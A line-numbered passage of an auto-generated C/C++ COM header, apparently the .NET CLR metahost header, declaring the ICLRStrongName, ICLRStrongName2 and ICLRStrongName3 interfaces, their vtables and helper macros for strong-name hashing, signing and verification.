ICLRStrongNameVtbl 1198 | { 1199 | BEGIN_INTERFACE 1200 | 1201 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 1202 | ICLRStrongName * This, 1203 | /* [in] */ REFIID riid, 1204 | /* [annotation][iid_is][out] */ 1205 | _COM_Outptr_ void **ppvObject); 1206 | 1207 | ULONG ( STDMETHODCALLTYPE *AddRef )( 1208 | ICLRStrongName * This); 1209 | 1210 | ULONG ( STDMETHODCALLTYPE *Release )( 1211 | ICLRStrongName * This); 1212 | 1213 | HRESULT ( STDMETHODCALLTYPE *GetHashFromAssemblyFile )( 1214 | ICLRStrongName * This, 1215 | /* [in] */ LPCSTR pszFilePath, 1216 | /* [out][in] */ unsigned int *piHashAlg, 1217 | /* [length_is][size_is][out] */ BYTE *pbHash, 1218 | /* [in] */ DWORD cchHash, 1219 | /* [out] */ DWORD *pchHash); 1220 | 1221 | HRESULT ( STDMETHODCALLTYPE *GetHashFromAssemblyFileW )( 1222 | ICLRStrongName * This, 1223 | /* [in] */ LPCWSTR pwzFilePath, 1224 | /* [out][in] */ unsigned int *piHashAlg, 1225 | /* [length_is][size_is][out] */ BYTE *pbHash, 1226 | /* [in] */ DWORD cchHash, 1227 | /* [out] */ DWORD *pchHash); 1228 | 1229 | HRESULT ( STDMETHODCALLTYPE *GetHashFromBlob )( 1230 | ICLRStrongName * This, 1231 | /* [in] */ BYTE *pbBlob, 1232 | /* [in] */ DWORD cchBlob, 1233 | /* [out][in] */ unsigned int *piHashAlg, 1234 | /* [length_is][size_is][out] */ BYTE *pbHash, 1235 | /* [in] */ DWORD cchHash, 1236 | /* [out] */ DWORD *pchHash); 1237 | 1238 | HRESULT ( STDMETHODCALLTYPE *GetHashFromFile )( 1239 | ICLRStrongName * This, 1240 | /* [in] */ LPCSTR pszFilePath, 1241 | /* [out][in] */ unsigned int *piHashAlg, 1242 | /* [length_is][size_is][out] */ BYTE *pbHash, 1243 | /* [in] */ DWORD cchHash, 1244 | /* [out] */ DWORD *pchHash); 1245 | 1246 | HRESULT ( STDMETHODCALLTYPE *GetHashFromFileW )( 1247 | ICLRStrongName * This, 1248 | /* [in] */ LPCWSTR pwzFilePath, 1249 | /* [out][in] */ unsigned int *piHashAlg, 1250 | /* [length_is][size_is][out] */ BYTE *pbHash, 1251 | /* [in] */ DWORD cchHash, 1252 | /* [out] */ DWORD *pchHash); 1253 | 1254 | HRESULT ( STDMETHODCALLTYPE *GetHashFromHandle )( 1255 | ICLRStrongName * This, 1256 | /* [in] */ HANDLE hFile, 1257 | /* [out][in] */ unsigned int *piHashAlg, 1258 | /* [length_is][size_is][out] */ BYTE *pbHash, 1259 | /* [in] */ DWORD cchHash, 1260 | /* [out] */ DWORD *pchHash); 1261 | 1262 | HRESULT ( STDMETHODCALLTYPE *StrongNameCompareAssemblies )( 1263 | ICLRStrongName * This, 1264 | /* [in] */ LPCWSTR pwzAssembly1, 1265 | /* [in] */ LPCWSTR pwzAssembly2, 1266 | /* [retval][out] */ DWORD *pdwResult); 1267 | 1268 | HRESULT ( STDMETHODCALLTYPE *StrongNameFreeBuffer )( 1269 | ICLRStrongName * This, 1270 | /* [in] */ BYTE *pbMemory); 1271 | 1272 | HRESULT ( STDMETHODCALLTYPE *StrongNameGetBlob )( 1273 | ICLRStrongName * This, 1274 | /* [in] */ LPCWSTR pwzFilePath, 1275 | /* [length_is][size_is][out][in] */ BYTE *pbBlob, 1276 | /* [out][in] */ DWORD *pcbBlob); 1277 | 1278 | HRESULT ( STDMETHODCALLTYPE *StrongNameGetBlobFromImage )( 1279 | ICLRStrongName * This, 1280 | /* [size_is][in] */ BYTE *pbBase, 1281 | /* [in] */ DWORD dwLength, 1282 | /* [length_is][size_is][out] */ BYTE *pbBlob, 1283 | /* [out][in] */ DWORD *pcbBlob); 1284 | 1285 | HRESULT ( STDMETHODCALLTYPE *StrongNameGetPublicKey )( 1286 | ICLRStrongName * This, 1287 | /* [in] */ LPCWSTR pwzKeyContainer, 1288 | /* [in] */ BYTE *pbKeyBlob, 1289 | /* [in] */ ULONG cbKeyBlob, 1290 | /* [out] */ BYTE **ppbPublicKeyBlob, 1291 | /* [out] */ ULONG *pcbPublicKeyBlob); 1292 | 1293 | HRESULT ( STDMETHODCALLTYPE *StrongNameHashSize )( 1294 | ICLRStrongName * This, 1295 | /* [in] */ ULONG ulHashAlg, 1296 | /* [retval][out] */ DWORD *pcbSize); 1297 | 1298 | HRESULT ( STDMETHODCALLTYPE *StrongNameKeyDelete )( 1299 | ICLRStrongName * This, 1300 | /* [in] */ LPCWSTR pwzKeyContainer); 1301 | 1302 | HRESULT ( STDMETHODCALLTYPE *StrongNameKeyGen )( 1303 | ICLRStrongName * This, 1304 | /* [in] */ LPCWSTR pwzKeyContainer, 1305 | /* [in] */ DWORD dwFlags, 1306 | /* [out] */ BYTE **ppbKeyBlob, 1307 | /* [out] */ ULONG *pcbKeyBlob); 1308 | 1309 | HRESULT ( STDMETHODCALLTYPE *StrongNameKeyGenEx )( 1310 | ICLRStrongName * This, 1311 | /* [in] */ LPCWSTR pwzKeyContainer, 1312 | /* [in] */ DWORD dwFlags, 1313 | /* [in] */ DWORD dwKeySize, 1314 | /* [out] */ BYTE **ppbKeyBlob, 1315 | /* [out] */ ULONG *pcbKeyBlob); 1316 | 1317 | HRESULT ( STDMETHODCALLTYPE *StrongNameKeyInstall )( 1318 | ICLRStrongName * This, 1319 | /* [in] */ LPCWSTR pwzKeyContainer, 1320 | /* [in] */ BYTE *pbKeyBlob, 1321 | /* [in] */ ULONG cbKeyBlob); 1322 | 1323 | HRESULT ( STDMETHODCALLTYPE *StrongNameSignatureGeneration )( 1324 | ICLRStrongName * This, 1325 | /* [in] */ LPCWSTR pwzFilePath, 1326 | /* [in] */ LPCWSTR pwzKeyContainer, 1327 | /* [in] */ BYTE *pbKeyBlob, 1328 | /* [in] */ ULONG cbKeyBlob, 1329 | /* [out] */ BYTE **ppbSignatureBlob, 1330 | /* [out] */ ULONG *pcbSignatureBlob); 1331 | 1332 | HRESULT ( STDMETHODCALLTYPE *StrongNameSignatureGenerationEx )( 1333 | ICLRStrongName * This, 1334 | /* [in] */ LPCWSTR wszFilePath, 1335 | /* [in] */ LPCWSTR wszKeyContainer, 1336 | /* [in] */ BYTE *pbKeyBlob, 1337 | /* [in] */ ULONG cbKeyBlob, 1338 | /* [out] */ BYTE **ppbSignatureBlob, 1339 | /* [out] */ ULONG *pcbSignatureBlob, 1340 | /* [in] */ DWORD dwFlags); 1341 | 1342 | HRESULT ( STDMETHODCALLTYPE *StrongNameSignatureSize )( 1343 | ICLRStrongName * This, 1344 | /* [in] */ BYTE *pbPublicKeyBlob, 1345 | /* [in] */ ULONG cbPublicKeyBlob, 1346 | /* [in] */ DWORD *pcbSize); 1347 | 1348 | HRESULT ( STDMETHODCALLTYPE *StrongNameSignatureVerification )( 1349 | ICLRStrongName * This, 1350 | /* [in] */ LPCWSTR pwzFilePath, 1351 | /* [in] */ DWORD dwInFlags, 1352 | /* [retval][out] */ DWORD *pdwOutFlags); 1353 | 1354 | HRESULT ( STDMETHODCALLTYPE *StrongNameSignatureVerificationEx )( 1355 | ICLRStrongName * This, 1356 | /* [in] */ LPCWSTR pwzFilePath, 1357 | /* [in] */ BOOLEAN fForceVerification, 1358 | /* [retval][out] */ BOOLEAN *pfWasVerified); 1359 | 1360 | HRESULT ( STDMETHODCALLTYPE *StrongNameSignatureVerificationFromImage )( 1361 | ICLRStrongName * This, 1362 | /* [in] */ BYTE *pbBase, 1363 | /* [in] */ DWORD dwLength, 1364 | /* [in] */ DWORD dwInFlags, 1365 | /* [retval][out] */ DWORD *pdwOutFlags); 1366 | 1367 | HRESULT ( STDMETHODCALLTYPE *StrongNameTokenFromAssembly )( 1368 | ICLRStrongName * This, 1369 | /* [in] */ LPCWSTR pwzFilePath, 1370 | /* [out] */ BYTE **ppbStrongNameToken, 1371 | /* [out] */ ULONG *pcbStrongNameToken); 1372 | 1373 | HRESULT ( STDMETHODCALLTYPE *StrongNameTokenFromAssemblyEx )( 1374 | ICLRStrongName * This, 1375 | /* [in] */ LPCWSTR pwzFilePath, 1376 | /* [out] */ BYTE **ppbStrongNameToken, 1377 | /* [out] */ ULONG *pcbStrongNameToken, 1378 | /* [out] */ BYTE **ppbPublicKeyBlob, 1379 | /* [out] */ ULONG *pcbPublicKeyBlob); 1380 | 1381 | HRESULT ( STDMETHODCALLTYPE *StrongNameTokenFromPublicKey )( 1382 | ICLRStrongName * This, 1383 | /* [in] */ BYTE *pbPublicKeyBlob, 1384 | /* [in] */ ULONG cbPublicKeyBlob, 1385 | /* [out] */ BYTE **ppbStrongNameToken, 1386 | /* [out] */ ULONG *pcbStrongNameToken); 1387 | 1388 | END_INTERFACE 1389 | } ICLRStrongNameVtbl; 1390 | 1391 | interface ICLRStrongName 1392 | { 1393 | CONST_VTBL struct ICLRStrongNameVtbl *lpVtbl; 1394 | }; 1395 | 1396 | 1397 | 1398 | #ifdef COBJMACROS 1399 | 1400 | 1401 | #define ICLRStrongName_QueryInterface(This,riid,ppvObject) \ 1402 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 1403 | 1404 | #define ICLRStrongName_AddRef(This) \ 1405 | ( (This)->lpVtbl -> AddRef(This) ) 1406 | 1407 | #define ICLRStrongName_Release(This) \ 1408 | ( (This)->lpVtbl -> Release(This) ) 1409 | 1410 | 1411 | #define ICLRStrongName_GetHashFromAssemblyFile(This,pszFilePath,piHashAlg,pbHash,cchHash,pchHash) \ 1412 | ( (This)->lpVtbl -> GetHashFromAssemblyFile(This,pszFilePath,piHashAlg,pbHash,cchHash,pchHash) ) 1413 | 1414 | #define ICLRStrongName_GetHashFromAssemblyFileW(This,pwzFilePath,piHashAlg,pbHash,cchHash,pchHash) \ 1415 | ( (This)->lpVtbl -> GetHashFromAssemblyFileW(This,pwzFilePath,piHashAlg,pbHash,cchHash,pchHash) ) 1416 | 1417 | #define ICLRStrongName_GetHashFromBlob(This,pbBlob,cchBlob,piHashAlg,pbHash,cchHash,pchHash) \ 1418 | ( (This)->lpVtbl -> GetHashFromBlob(This,pbBlob,cchBlob,piHashAlg,pbHash,cchHash,pchHash) ) 1419 | 1420 | #define ICLRStrongName_GetHashFromFile(This,pszFilePath,piHashAlg,pbHash,cchHash,pchHash) \ 1421 | ( (This)->lpVtbl -> GetHashFromFile(This,pszFilePath,piHashAlg,pbHash,cchHash,pchHash) ) 1422 | 1423 | #define ICLRStrongName_GetHashFromFileW(This,pwzFilePath,piHashAlg,pbHash,cchHash,pchHash) \ 1424 | ( (This)->lpVtbl -> GetHashFromFileW(This,pwzFilePath,piHashAlg,pbHash,cchHash,pchHash) ) 1425 | 1426 | #define ICLRStrongName_GetHashFromHandle(This,hFile,piHashAlg,pbHash,cchHash,pchHash) \ 1427 | ( (This)->lpVtbl -> GetHashFromHandle(This,hFile,piHashAlg,pbHash,cchHash,pchHash) ) 1428 | 1429 | #define ICLRStrongName_StrongNameCompareAssemblies(This,pwzAssembly1,pwzAssembly2,pdwResult) \ 1430 | ( (This)->lpVtbl -> StrongNameCompareAssemblies(This,pwzAssembly1,pwzAssembly2,pdwResult) ) 1431 | 1432 | #define ICLRStrongName_StrongNameFreeBuffer(This,pbMemory) \ 1433 | ( (This)->lpVtbl -> StrongNameFreeBuffer(This,pbMemory) ) 1434 | 1435 | #define ICLRStrongName_StrongNameGetBlob(This,pwzFilePath,pbBlob,pcbBlob) \ 1436 | ( (This)->lpVtbl -> StrongNameGetBlob(This,pwzFilePath,pbBlob,pcbBlob) ) 1437 | 1438 | #define ICLRStrongName_StrongNameGetBlobFromImage(This,pbBase,dwLength,pbBlob,pcbBlob) \ 1439 | ( (This)->lpVtbl -> StrongNameGetBlobFromImage(This,pbBase,dwLength,pbBlob,pcbBlob) ) 1440 | 1441 | #define ICLRStrongName_StrongNameGetPublicKey(This,pwzKeyContainer,pbKeyBlob,cbKeyBlob,ppbPublicKeyBlob,pcbPublicKeyBlob) \ 1442 | ( (This)->lpVtbl -> StrongNameGetPublicKey(This,pwzKeyContainer,pbKeyBlob,cbKeyBlob,ppbPublicKeyBlob,pcbPublicKeyBlob) ) 1443 | 1444 | #define ICLRStrongName_StrongNameHashSize(This,ulHashAlg,pcbSize) \ 1445 | ( (This)->lpVtbl -> StrongNameHashSize(This,ulHashAlg,pcbSize) ) 1446 | 1447 | #define ICLRStrongName_StrongNameKeyDelete(This,pwzKeyContainer) \ 1448 | ( (This)->lpVtbl -> StrongNameKeyDelete(This,pwzKeyContainer) ) 1449 | 1450 | #define ICLRStrongName_StrongNameKeyGen(This,pwzKeyContainer,dwFlags,ppbKeyBlob,pcbKeyBlob) \ 1451 | ( (This)->lpVtbl -> StrongNameKeyGen(This,pwzKeyContainer,dwFlags,ppbKeyBlob,pcbKeyBlob) ) 1452 | 1453 | #define ICLRStrongName_StrongNameKeyGenEx(This,pwzKeyContainer,dwFlags,dwKeySize,ppbKeyBlob,pcbKeyBlob) \ 1454 | ( (This)->lpVtbl -> StrongNameKeyGenEx(This,pwzKeyContainer,dwFlags,dwKeySize,ppbKeyBlob,pcbKeyBlob) ) 1455 | 1456 | #define ICLRStrongName_StrongNameKeyInstall(This,pwzKeyContainer,pbKeyBlob,cbKeyBlob) \ 1457 | ( (This)->lpVtbl -> StrongNameKeyInstall(This,pwzKeyContainer,pbKeyBlob,cbKeyBlob) ) 1458 | 1459 | #define ICLRStrongName_StrongNameSignatureGeneration(This,pwzFilePath,pwzKeyContainer,pbKeyBlob,cbKeyBlob,ppbSignatureBlob,pcbSignatureBlob) \ 1460 | ( (This)->lpVtbl -> StrongNameSignatureGeneration(This,pwzFilePath,pwzKeyContainer,pbKeyBlob,cbKeyBlob,ppbSignatureBlob,pcbSignatureBlob) ) 1461 | 1462 | #define ICLRStrongName_StrongNameSignatureGenerationEx(This,wszFilePath,wszKeyContainer,pbKeyBlob,cbKeyBlob,ppbSignatureBlob,pcbSignatureBlob,dwFlags) \ 1463 | ( (This)->lpVtbl -> StrongNameSignatureGenerationEx(This,wszFilePath,wszKeyContainer,pbKeyBlob,cbKeyBlob,ppbSignatureBlob,pcbSignatureBlob,dwFlags) ) 1464 | 1465 | #define ICLRStrongName_StrongNameSignatureSize(This,pbPublicKeyBlob,cbPublicKeyBlob,pcbSize) \ 1466 | ( (This)->lpVtbl -> StrongNameSignatureSize(This,pbPublicKeyBlob,cbPublicKeyBlob,pcbSize) ) 1467 | 1468 | #define ICLRStrongName_StrongNameSignatureVerification(This,pwzFilePath,dwInFlags,pdwOutFlags) \ 1469 | ( (This)->lpVtbl -> StrongNameSignatureVerification(This,pwzFilePath,dwInFlags,pdwOutFlags) ) 1470 | 1471 | #define ICLRStrongName_StrongNameSignatureVerificationEx(This,pwzFilePath,fForceVerification,pfWasVerified) \ 1472 | ( (This)->lpVtbl -> StrongNameSignatureVerificationEx(This,pwzFilePath,fForceVerification,pfWasVerified) ) 1473 | 1474 | #define ICLRStrongName_StrongNameSignatureVerificationFromImage(This,pbBase,dwLength,dwInFlags,pdwOutFlags) \ 1475 | ( (This)->lpVtbl -> StrongNameSignatureVerificationFromImage(This,pbBase,dwLength,dwInFlags,pdwOutFlags) ) 1476 | 1477 | #define ICLRStrongName_StrongNameTokenFromAssembly(This,pwzFilePath,ppbStrongNameToken,pcbStrongNameToken) \ 1478 | ( (This)->lpVtbl -> StrongNameTokenFromAssembly(This,pwzFilePath,ppbStrongNameToken,pcbStrongNameToken) ) 1479 | 1480 | #define ICLRStrongName_StrongNameTokenFromAssemblyEx(This,pwzFilePath,ppbStrongNameToken,pcbStrongNameToken,ppbPublicKeyBlob,pcbPublicKeyBlob) \ 1481 | ( (This)->lpVtbl -> StrongNameTokenFromAssemblyEx(This,pwzFilePath,ppbStrongNameToken,pcbStrongNameToken,ppbPublicKeyBlob,pcbPublicKeyBlob) ) 1482 | 1483 | #define ICLRStrongName_StrongNameTokenFromPublicKey(This,pbPublicKeyBlob,cbPublicKeyBlob,ppbStrongNameToken,pcbStrongNameToken) \ 1484 | ( (This)->lpVtbl -> StrongNameTokenFromPublicKey(This,pbPublicKeyBlob,cbPublicKeyBlob,ppbStrongNameToken,pcbStrongNameToken) ) 1485 | 1486 | #endif /* COBJMACROS */ 1487 | 1488 | 1489 | #endif /* C style interface */ 1490 | 1491 | 1492 | 1493 | 1494 | #endif /* __ICLRStrongName_INTERFACE_DEFINED__ */ 1495 | 1496 | 1497 | #ifndef __ICLRStrongName2_INTERFACE_DEFINED__ 1498 | #define __ICLRStrongName2_INTERFACE_DEFINED__ 1499 | 1500 | /* interface ICLRStrongName2 */ 1501 | /* [object][local][helpstring][version][uuid] */ 1502 | 1503 | 1504 | EXTERN_C const IID IID_ICLRStrongName2; 1505 | 1506 | #if defined(__cplusplus) && !defined(CINTERFACE) 1507 | 1508 | MIDL_INTERFACE("C22ED5C5-4B59-4975-90EB-85EA55C0069B") 1509 | ICLRStrongName2 : public IUnknown 1510 | { 1511 | public: 1512 | virtual HRESULT STDMETHODCALLTYPE StrongNameGetPublicKeyEx( 1513 | /* [in] */ LPCWSTR pwzKeyContainer, 1514 | /* [in] */ BYTE *pbKeyBlob, 1515 | /* [in] */ ULONG cbKeyBlob, 1516 | /* [out] */ BYTE **ppbPublicKeyBlob, 1517 | /* [out] */ ULONG *pcbPublicKeyBlob, 1518 | /* [in] */ ULONG uHashAlgId, 1519 | /* [in] */ ULONG uReserved) = 0; 1520 | 1521 | virtual HRESULT STDMETHODCALLTYPE StrongNameSignatureVerificationEx2( 1522 | /* [in] */ LPCWSTR wszFilePath, 1523 | /* [in] */ BOOLEAN fForceVerification, 1524 | /* [in] */ BYTE *pbEcmaPublicKey, 1525 | /* [in] */ DWORD cbEcmaPublicKey, 1526 | /* [out] */ BOOLEAN *pfWasVerified) = 0; 1527 | 1528 | }; 1529 | 1530 | 1531 | #else /* C style interface */ 1532 | 1533 | typedef struct ICLRStrongName2Vtbl 1534 | { 1535 | BEGIN_INTERFACE 1536 | 1537 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 1538 | ICLRStrongName2 * This, 1539 | /* [in] */ REFIID riid, 1540 | /* [annotation][iid_is][out] */ 1541 | _COM_Outptr_ void **ppvObject); 1542 | 1543 | ULONG ( STDMETHODCALLTYPE *AddRef )( 1544 | ICLRStrongName2 * This); 1545 | 1546 | ULONG ( STDMETHODCALLTYPE *Release )( 1547 | ICLRStrongName2 * This); 1548 | 1549 | HRESULT ( STDMETHODCALLTYPE *StrongNameGetPublicKeyEx )( 1550 | ICLRStrongName2 * This, 1551 | /* [in] */ LPCWSTR pwzKeyContainer, 1552 | /* [in] */ BYTE *pbKeyBlob, 1553 | /* [in] */ ULONG cbKeyBlob, 1554 | /* [out] */ BYTE **ppbPublicKeyBlob, 1555 | /* [out] */ ULONG *pcbPublicKeyBlob, 1556 | /* [in] */ ULONG uHashAlgId, 1557 | /* [in] */ ULONG uReserved); 1558 | 1559 | HRESULT ( STDMETHODCALLTYPE *StrongNameSignatureVerificationEx2 )( 1560 | ICLRStrongName2 * This, 1561 | /* [in] */ LPCWSTR wszFilePath, 1562 | /* [in] */ BOOLEAN fForceVerification, 1563 | /* [in] */ BYTE *pbEcmaPublicKey, 1564 | /* [in] */ DWORD cbEcmaPublicKey, 1565 | /* [out] */ BOOLEAN *pfWasVerified); 1566 | 1567 | END_INTERFACE 1568 | } ICLRStrongName2Vtbl; 1569 | 1570 | interface ICLRStrongName2 1571 | { 1572 | CONST_VTBL struct ICLRStrongName2Vtbl *lpVtbl; 1573 | }; 1574 | 1575 | 1576 | 1577 | #ifdef COBJMACROS 1578 | 1579 | 1580 | #define ICLRStrongName2_QueryInterface(This,riid,ppvObject) \ 1581 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 1582 | 1583 | #define ICLRStrongName2_AddRef(This) \ 1584 | ( (This)->lpVtbl -> AddRef(This) ) 1585 | 1586 | #define ICLRStrongName2_Release(This) \ 1587 | ( (This)->lpVtbl -> Release(This) ) 1588 | 1589 | 1590 | #define ICLRStrongName2_StrongNameGetPublicKeyEx(This,pwzKeyContainer,pbKeyBlob,cbKeyBlob,ppbPublicKeyBlob,pcbPublicKeyBlob,uHashAlgId,uReserved) \ 1591 | ( (This)->lpVtbl -> StrongNameGetPublicKeyEx(This,pwzKeyContainer,pbKeyBlob,cbKeyBlob,ppbPublicKeyBlob,pcbPublicKeyBlob,uHashAlgId,uReserved) ) 1592 | 1593 | #define ICLRStrongName2_StrongNameSignatureVerificationEx2(This,wszFilePath,fForceVerification,pbEcmaPublicKey,cbEcmaPublicKey,pfWasVerified) \ 1594 | ( (This)->lpVtbl -> StrongNameSignatureVerificationEx2(This,wszFilePath,fForceVerification,pbEcmaPublicKey,cbEcmaPublicKey,pfWasVerified) ) 1595 | 1596 | #endif /* COBJMACROS */ 1597 | 1598 | 1599 | #endif /* C style interface */ 1600 | 1601 | 1602 | 1603 | 1604 | #endif /* __ICLRStrongName2_INTERFACE_DEFINED__ */ 1605 | 1606 | 1607 | #ifndef __ICLRStrongName3_INTERFACE_DEFINED__ 1608 | #define __ICLRStrongName3_INTERFACE_DEFINED__ 1609 | 1610 | /* interface ICLRStrongName3 */ 1611 | /* [object][local][helpstring][version][uuid] */ 1612 | 1613 | 1614 | EXTERN_C const IID IID_ICLRStrongName3; 1615 | 1616 | #if defined(__cplusplus) && !defined(CINTERFACE) 1617 | 1618 | MIDL_INTERFACE("22c7089b-bbd3-414a-b698-210f263f1fed") 1619 | ICLRStrongName3 : public IUnknown 1620 | { 1621 | public: 1622 | virtual HRESULT STDMETHODCALLTYPE StrongNameDigestGenerate( 1623 | /* [in] */ LPCWSTR wszFilePath, 1624 | /* [out] */ BYTE **ppbDigestBlob, 1625 | /* [out] */ ULONG *pcbDigestBlob, 1626 | /* [in] */ DWORD dwFlags) = 0; 1627 | 1628 | virtual HRESULT STDMETHODCALLTYPE StrongNameDigestSign( 1629 | /* [in] */ LPCWSTR wszKeyContainer, 1630 | /* [size_is][in] */ BYTE *pbKeyBlob, 1631 | /* [in] */ ULONG cbKeyBlob, 1632 | /* [size_is][in] */ BYTE *pbDigestBlob, 1633 | /* [in] */ ULONG cbDigestBlob, 1634 | /* [in] */ DWORD hashAlgId, 1635 | /* [out] */ BYTE **ppbSignatureBlob, 1636 | /* [out] */ ULONG *pcbSignatureBlob, 1637 | /* [in] */ DWORD dwFlags) = 0; 1638 | 1639 | virtual HRESULT STDMETHODCALLTYPE StrongNameDigestEmbed( 1640 | /* [in] */ LPCWSTR wszFilePath, 1641 | /* [size_is][in] */ BYTE *pbSignatureBlob, 1642 | /* [in] */ ULONG cbSignatureBlob) = 0; 1643 | 1644 | }; 1645 | 1646 | 1647 | #else /* C style interface */ 1648 | 1649 | typedef struct ICLRStrongName3Vtbl 1650 | { 1651 | BEGIN_INTERFACE 1652 | 1653 | HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 1654 | ICLRStrongName3 * This, 1655 | /* [in] */ REFIID riid, 1656 | /* [annotation][iid_is][out] */ 1657 | _COM_Outptr_ void **ppvObject); 1658 | 1659 | ULONG ( STDMETHODCALLTYPE *AddRef )( 1660 | ICLRStrongName3 * This); 1661 | 1662 | ULONG ( STDMETHODCALLTYPE *Release )( 1663 | ICLRStrongName3 * This); 1664 | 1665 | HRESULT ( STDMETHODCALLTYPE *StrongNameDigestGenerate )( 1666 | ICLRStrongName3 * This, 1667 | /* [in] */ LPCWSTR wszFilePath, 1668 | /* [out] */ BYTE **ppbDigestBlob, 1669 | /* [out] */ ULONG *pcbDigestBlob, 1670 | /* [in] */ DWORD dwFlags); 1671 | 1672 | HRESULT ( STDMETHODCALLTYPE *StrongNameDigestSign )( 1673 | ICLRStrongName3 * This, 1674 | /* [in] */ LPCWSTR wszKeyContainer, 1675 | /* [size_is][in] */ BYTE *pbKeyBlob, 1676 | /* [in] */ ULONG cbKeyBlob, 1677 | /* [size_is][in] */ BYTE *pbDigestBlob, 1678 | /* [in] */ ULONG cbDigestBlob, 1679 | /* [in] */ DWORD hashAlgId, 1680 | /* [out] */ BYTE **ppbSignatureBlob, 1681 | /* [out] */ ULONG *pcbSignatureBlob, 1682 | /* [in] */ DWORD dwFlags); 1683 | 1684 | HRESULT ( STDMETHODCALLTYPE *StrongNameDigestEmbed )( 1685 | ICLRStrongName3 * This, 1686 | /* [in] */ LPCWSTR wszFilePath, 1687 | /* [size_is][in] */ BYTE *pbSignatureBlob, 1688 | /* [in] */ ULONG cbSignatureBlob); 1689 | 1690 | END_INTERFACE 1691 | } ICLRStrongName3Vtbl; 1692 | 1693 | interface ICLRStrongName3 1694 | { 1695 | CONST_VTBL struct ICLRStrongName3Vtbl *lpVtbl; 1696 | }; 1697 | 1698 | 1699 | 1700 | #ifdef COBJMACROS 1701 | 1702 | 1703 | #define ICLRStrongName3_QueryInterface(This,riid,ppvObject) \ 1704 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 1705 | 1706 | #define ICLRStrongName3_AddRef(This) \ 1707 | ( (This)->lpVtbl -> AddRef(This) ) 1708 | 1709 | #define ICLRStrongName3_Release(This) \ 1710 | ( (This)->lpVtbl -> Release(This) ) 1711 | 1712 | 1713 | #define ICLRStrongName3_StrongNameDigestGenerate(This,wszFilePath,ppbDigestBlob,pcbDigestBlob,dwFlags) \ 1714 | ( (This)->lpVtbl -> StrongNameDigestGenerate(This,wszFilePath,ppbDigestBlob,pcbDigestBlob,dwFlags) ) 1715 | 1716 | #define ICLRStrongName3_StrongNameDigestSign(This,wszKeyContainer,pbKeyBlob,cbKeyBlob,pbDigestBlob,cbDigestBlob,hashAlgId,ppbSignatureBlob,pcbSignatureBlob,dwFlags) \ 1717 | ( (This)->lpVtbl -> StrongNameDigestSign(This,wszKeyContainer,pbKeyBlob,cbKeyBlob,pbDigestBlob,cbDigestBlob,hashAlgId,ppbSignatureBlob,pcbSignatureBlob,dwFlags) ) 1718 | 1719 | #define ICLRStrongName3_StrongNameDigestEmbed(This,wszFilePath,pbSignatureBlob,cbSignatureBlob) \ 1720 | ( (This)->lpVtbl -> StrongNameDigestEmbed(This,wszFilePath,pbSignatureBlob,cbSignatureBlob) ) 1721 | 1722 | #endif /* COBJMACROS */ 1723 | 1724 | 1725 | #endif /* C style interface */ 1726 | 1727 | 1728 | 1729 | 1730 | #endif /* __ICLRStrongName3_INTERFACE_DEFINED__ */ 1731 | 1732 | 1733 | 1734 | #ifndef __CLRMetaHost_LIBRARY_DEFINED__ 1735 | #define __CLRMetaHost_LIBRARY_DEFINED__ 1736 | 1737 | /* library CLRMetaHost */ 1738 | /* [version][uuid] */ 1739 | 1740 | 1741 | 1742 | 1743 | 1744 | 1745 | 1746 | 1747 | 1748 | EXTERN_C const IID LIBID_CLRMetaHost; 1749 | #endif /* __CLRMetaHost_LIBRARY_DEFINED__ */ 1750 | 1751 | /* interface __MIDL_itf_metahost_0000_0010 */ 1752 | /* [local] */ 1753 | 1754 | #endif // WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) 1755 | 1756 | 1757 | extern RPC_IF_HANDLE __MIDL_itf_metahost_0000_0010_v0_0_c_ifspec; 1758 | extern RPC_IF_HANDLE __MIDL_itf_metahost_0000_0010_v0_0_s_ifspec; 1759 | 1760 | /* Additional Prototypes for ALL interfaces */ 1761 | 1762 | /* end of Additional Prototypes */ 1763 | 1764 | #ifdef __cplusplus 1765 | } 1766 | #endif 1767 | 1768 | #endif 1769 | 1770 | 1771 | --------------------------------------------------------------------------------